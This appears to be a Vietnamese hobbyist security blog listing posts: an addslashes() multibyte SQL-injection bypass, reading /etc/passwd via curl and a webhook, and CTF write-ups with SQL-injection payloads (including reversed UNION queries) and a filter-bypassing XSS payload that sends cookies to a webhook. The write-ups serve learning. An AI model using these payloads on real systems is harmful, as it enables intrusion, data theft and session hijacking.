Bài đăng

Hình ảnh
 Mình đã hắc với curl như thế nào :V như các bạn có thể thấy, mình tạo 1 cái webhook để nhận request. Bây giờ thử đọc file /etc/passwd thôi 
Hình ảnh
Sqli, làm thế nào để bypass hàm addslashes() trong php Mình sẽ liên tục update blog để nâng cao kiến thức, sẽ có nhiều sai sót nên mong mn góp ý. mình sẽ vd một đoạn query trong php: select id, from user where username = " ' " . addslashes($_GET['username']). " ' "; theo như trên doc, hàm addslashes() sẽ thêm dấu '\' vào trước các kí tự  ';";\;\;NULL. các kí tự này. Ta có kí tự 0xbf5c là một kí tự nhiều byte. Khi chung ta thêm %bf%27 kí tự \ sẽ được thêm vào trước dấu ' ->%bf%5C%27 mà %bf%5C là kí tự trung quốc nghĩa là ? lúc này đoạn mã của chúng ta sẽ thành ?' và nháy đơn sẽ được thực thi :v P/s: điều này chỉ hoạt động ở một số version php cũ
Hình ảnh
 SERI TRUYỀN KÌ BUCKET CTF thật sú, giải này mình hơi phân tâm do chs tận 3 giải nên kết quả khá tệ, T_T Let's go Misc1: survey. Bài này là nháp thôi, lấy ý kiến người dùng rồi cho flag nên tui sẽ bỏ qua :DD Pwn1: Parrot Đề bài cho mình 1 link, netcat thử xem. Mình thử nhập admin thấy nó trả về Hello {input}\n ! You'll never get my secret! Mình thử kiểm tra xem nó có bị buffer overflow ko Trông có vẻ là không bị, mình thử kiểm tra lỗi khác cụ thể là format string attack. À há, bị lỗi nha :DD bây giờ chỉ cần tìm flag thôi :> Crypto1: TBBDLCG lần này tiếp tục netcat để tìm flag mình thử nhập đại  Bài này h mình còn chả biết làm thế nào mà mình solve đc :v mình chỉ nhớ spin bot là locate mình :v Thế là qua, nhưng h thấy lại thì ăn may tận 5 lần :)) Web1: SQLi 1 Đề cho như này, thử xem có gì không mình được cho một trang index như này. Với kinh nghiệm deface mõm lâu năm, thử payload admin'or'1'='1'-- - thế là có flag :D Web2: SQLi 2 Tiếp tục với chall sqli 2

PTIT

Hình ảnh
Hello mọi người vẫn là K0n vip pro đây :> lại là 1 chall khác, lần này liên quan đến lỗi si cồ in jec sần (SQL injection) mình có một trang vậy, test thử thôi Nhập thử dấu nháy đơn, có vẻ nó đã bị sao đó. Sau 1 hồi fuzz mình nhập thử iw thì thấy có kết quả trả về Có thể thấy iw là reverse của chữ wi có trong username. kết hợp với tên đề bài mình có thể đoán đoạn query như này SELECT id,username,email from users where username like " '% "+strrev($_GET['username'])+" %' " Ở đây mình sẽ sử dụng python giúp mình chuyển đổi cách câu lệnh thành rev kết quả thu được như sau, vậy là mình có thể SQl một cách dễ dàng. Payload: #'1'='1'ro' Mình muốn tìm xem có bao nhiêu cột: payload #4 yb redro' Xác nhận nó có 3 cột. Xác định nó đang dùng mysql nên dễ dàng tìm được databases của nó. Payload: #atamehcs.amehcs_noitamrofni morf eman_amehcs,llun,llun tceles noinu' Thấy database sqli khả nghi, thử tìm table. Và thấy 2 table là flag và

PTIT

Hình ảnh
Pờ tít ver miền Bắc Mở bài: hế lô các bạn mình là K0n đây. Sau một chuỗi ngày tạch môn, lên voi xuống chóa thì tự dưng thấy pờ tít có giải cũng vui vui nên mình có tham gia thử. Rất cảm ơn các bạn đã tạo điều kiện cho mình được tham gia cùng. Thân bài: Chúng ta được cung cấp 2 link   +)link chall:  http://167.172.80.186:1337/   +)link bot:  http://167.172.80.186:7777/ Với kiểu này mình đoán sẽ liên quan đến lỗi xss, đây là một trong các lỗi cơ bản của mình học bảo mật. Đầu tiên là form login, hãy tạo 1 tài khoản để chơi thôi Mình đã có 1 tài khoản, chuyển hướng đến home mình thấy một creat note. Có lẽ đây là nơi có vuln. Tạo một script đơn giản: <script>alert(1)</script>, tag script đã bị filter. Có rất nhiều cách để bypass cái này nhưng mình sẽ chọn 1 cách đơn giản hơn. Sửa payload thành <scRIpt>alert(1)</scRIpt> nó bật lên cửa sổ, bây giờ mình tạo 1 cái webhook để lấy cookie và gửi cho admin Payload: <scRipt>var i = new Image;i.src="[link-hook]"